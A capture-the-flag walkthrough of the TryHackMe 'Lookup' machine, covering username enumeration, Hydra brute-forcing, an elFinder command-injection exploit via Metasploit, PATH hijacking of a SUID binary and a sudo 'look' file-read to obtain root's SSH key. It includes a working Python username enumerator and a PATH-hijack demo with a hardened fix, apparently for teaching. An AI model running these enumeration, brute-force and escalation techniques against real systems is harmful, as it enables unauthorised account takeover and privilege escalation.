This post is a walkthrough of the TryHackMe boot-to-root machine Lookup. It follows the typical flow: Nmap scanning and enumeration turn up a login form; a short Python script enumerates the valid usernames and Hydra brute-forces one user's password. After authenticating we land on a file manager hosted on a subdomain, and the version of that application is vulnerable to PHP command injection; the matching Metasploit module gives an initial foothold as www-data. We then move laterally to a second user by abusing a misconfigured SUID binary and finish with a GTFOBins sudo technique to obtain root.
1. Initial Scanning
- The presenter starts with an Nmap scan to identify open ports and services on the target. The scan reveals:
- Port 22: SSH
- Port 80: HTTP
- Aggressive timing is acceptable here because the target is a lab machine; against a production host the same scan could trip firewalls or intrusion detection, so slower timing would be used.
2. Web Application Enumeration
- Browsing to the web service on port 80 redirects to a hostname, which is added to /etc/hosts so the site resolves; it presents a login form.
- Attempts to log in with default credentials (admin:admin) fail.
- Using Burp Suite, the presenter intercepts the login request and notices that the error message differs depending on whether the submitted username exists: a username-enumeration flaw that can be scripted.
3. Brute Force Attack
- A short Python script submits each candidate username with a dummy password and keeps those whose response indicates a wrong password rather than an unknown user.
- The script identifies two valid usernames: admin and jose.
- Hydra is then run against the login form, using that failure string as the match condition, to brute-force jose's password, which turns out to be password123.
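The username-enumeration step above, as an added example that is not the post's own script. It assumes the login endpoint, the form field names and the two error strings (copy the real ones from the Burp responses before pointing it at a target); a constructed stand-in server is included so the logic runs offline.

```python
"""Username enumeration against a login form whose error message differs
for unknown and known users.  Added example; not the post's own script.
The endpoint, the form field names and the two error strings are
assumptions modelled on the behaviour described in the walkthrough.
"""
import sys
import urllib.parse
import urllib.request

LOGIN_URL = "http://lookup.thm/login.php"        # assumed endpoint
UNKNOWN_USER_MSG = "Wrong username or password"  # assumed: user does not exist
WRONG_PASSWORD_MSG = "Wrong password"            # assumed: user exists, bad password


def post_login(url, username, password, timeout=5):
    """POST the login form and return the response body (redirects followed)."""
    data = urllib.parse.urlencode({"username": username,
                                   "password": password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def classify(body):
    """Map a login response body to 'invalid', 'valid' or 'unknown'."""
    if UNKNOWN_USER_MSG in body:
        return "invalid"
    if WRONG_PASSWORD_MSG in body:
        return "valid"
    return "unknown"  # success page, lockout or error: inspect it by hand


def enumerate_users(candidates, fetch=None, url=LOGIN_URL):
    """Return {username: verdict} for every candidate not reported as unknown.

    `fetch(username)` returns a response body; by default it posts to `url`
    with a dummy password.  Passing a different `fetch` lets the logic run
    offline, as the constructed server below does.
    """
    if fetch is None:
        def fetch(user):
            return post_login(url, user, "x")
    results = {}
    for user in candidates:
        verdict = classify(fetch(user))
        if verdict != "invalid":
            results[user] = verdict
    return results


# Constructed stand-in for the web application so the block runs offline.
_FAKE_ACCOUNTS = {"admin": "s3cret", "jose": "password123"}


def fake_server(username, password="x"):
    if username not in _FAKE_ACCOUNTS:
        return "<p>Wrong username or password. Please try again.</p>"
    if _FAKE_ACCOUNTS[username] != password:
        return "<p>Wrong password. Please try again.</p>"
    return "<p>Login successful</p>"


if __name__ == "__main__":
    if len(sys.argv) == 2:  # live run: python3 enum_users.py names.txt
        with open(sys.argv[1]) as fh:
            names = [line.strip() for line in fh if line.strip()]
        print(enumerate_users(names))
    else:                   # offline demonstration against the fake server
        print(enumerate_users(["root", "admin", "guest", "jose", "test"],
                              fetch=fake_server))
```

Anything classified as unknown is worth a manual look: a candidate that neither error string matches is either a lockout, a changed page, or an account whose dummy password happened to be right. The same two strings are what you feed Hydra afterwards as its failure condition.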
4. Exploitation of the Web Application
- After logging in as jose, the browser is redirected to a subdomain hosting a file manager with various files.
- Among them is a file named credentials, which contains a username (think) but no usable password.
- The file manager identifies itself as elFinder, and the deployed version is vulnerable to a PHP command injection.
- Using SearchSploit, the presenter finds an exploit matching that version, runs it through Metasploit, and obtains a reverse shell on the machine.
5. Privilege Escalation
- The initial shell runs as www-data. The goal is to escalate to think and then to root.
- Enumerating SUID binaries reveals pwm, which runs as root. It calls id to work out which user invoked it, then reads a password file from that user's home directory.
- Because pwm invokes id by name rather than by absolute path, placing a fake id script earlier in PATH that prints think's uid and name makes pwm read think's home directory and dump its passwords file.
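The PATH hijack described above, as an added example that is not code from the walkthrough. It reproduces the control flow attributed to pwm (run id, parse the username, read that user's password file) in an unprivileged Python helper, plants a fake id in a temporary directory, and shows a hardened variant that asks the kernel for the real uid instead. The home-directory layout, the .passwords file name and the id output format are constructed for the demo.

```python
"""PATH hijacking of a privileged helper that shells out to `id`.

Added example, not code from the post.  `vulnerable_lookup_user` and
`vulnerable_read_passwords` mimic the behaviour the walkthrough attributes
to pwm; `hardened_lookup_user` shows the fix.  Nothing here is SUID and the
home layout, the `.passwords` name and the `id` output format are assumed
for the demo, so the run is harmless, but the control flow is the same.
"""
import os
import pwd
import re
import stat
import subprocess
import tempfile

ID_RE = re.compile(r"uid=\d+\(([^)]+)\)")


def username_from_id_output(text):
    """Pull the account name out of `uid=33(www-data) gid=...` style output."""
    match = ID_RE.search(text)
    return match.group(1) if match else None


def vulnerable_lookup_user(env=None):
    """Resolve the caller by running whichever `id` PATH finds first.

    Whoever controls PATH controls which `id` runs, so the answer is
    attacker-chosen.  A SUID binary doing this hands over its privileges.
    """
    proc = subprocess.run(["id"], capture_output=True, text=True,
                          env=env, check=True)
    return username_from_id_output(proc.stdout)


def vulnerable_read_passwords(home_root, env=None):
    """Read <home_root>/<user>/.passwords for whatever user `id` claims."""
    user = vulnerable_lookup_user(env)
    with open(os.path.join(home_root, user, ".passwords")) as fh:
        return fh.read()


def hardened_lookup_user():
    """Ask the kernel for the real uid instead of trusting a child process."""
    uid = os.getuid()
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:  # uid without a passwd entry (common in containers)
        return str(uid)


def plant_fake_id(directory, victim):
    """Write an executable `id` that claims to be `victim`; return its path."""
    path = os.path.join(directory, "id")
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\n")
        fh.write(f'echo "uid=1001({victim}) gid=1001({victim}) '
                 f'groups=1001({victim})"\n')
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return path


def hijack_demo(victim="think"):
    """Run the attack end to end inside a temporary directory.

    Returns (user seen by the vulnerable helper, user seen by the hardened
    helper, contents the vulnerable helper leaked from the victim's file).
    """
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed victim home with a fake password list.
        victim_home = os.path.join(tmp, "home", victim)
        os.makedirs(victim_home)
        with open(os.path.join(victim_home, ".passwords"), "w") as fh:
            fh.write("password123\nhunter2\n")
        # Attacker-controlled directory goes first in PATH, the same effect
        # as `export PATH=/tmp:$PATH` on the target.
        fake_bin = os.path.join(tmp, "bin")
        os.makedirs(fake_bin)
        plant_fake_id(fake_bin, victim)
        env = dict(os.environ,
                   PATH=fake_bin + os.pathsep + os.environ.get("PATH", ""))
        leaked = vulnerable_read_passwords(os.path.join(tmp, "home"), env)
        return vulnerable_lookup_user(env), hardened_lookup_user(), leaked


if __name__ == "__main__":
    seen_by_helper, real_user, leaked = hijack_demo("think")
    print(f"vulnerable helper thinks it was called by: {seen_by_helper}")
    print(f"hardened helper reports:                  {real_user}")
    print("leaked lines:", leaked.split())
```

On the target the same thing is three shell steps: write a script named id into a writable directory, make it executable, and prepend that directory to PATH before running pwm. The defensive lesson is the hardened function: a privileged program must never derive identity from a child process it locates through the caller's PATH; use getuid()/getpwuid, or at least an absolute path and a sanitised environment.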
6. Further Enumeration and Root Escalation
- The dumped list is used as a password wordlist for Hydra against SSH, which finds think's password.
- Logging in as think over SSH, sudo -l shows that the user may run the look binary as root.
- As documented on GTFOBins, look with an empty prefix string prints every line of the file it is given, so it reads arbitrary files as root, including the root user's private SSH key.
- Using that key, the presenter logs in as root and collects both the user and root flags.
Key Techniques Demonstrated
- Reconnaissance: Nmap for port and service discovery, Burp Suite for inspecting the login flow.
- Brute forcing: a custom script for username enumeration and Hydra for password guessing against both the web form and SSH.
- Exploitation: matching the file manager's version to a public exploit with SearchSploit and running it through Metasploit.
- Privilege escalation: PATH hijacking of a SUID binary, reuse of the recovered passwords, and a GTFOBins sudo technique to read root's SSH key.
TryHackMe Lookup | Room Answers
Room answers can be found here.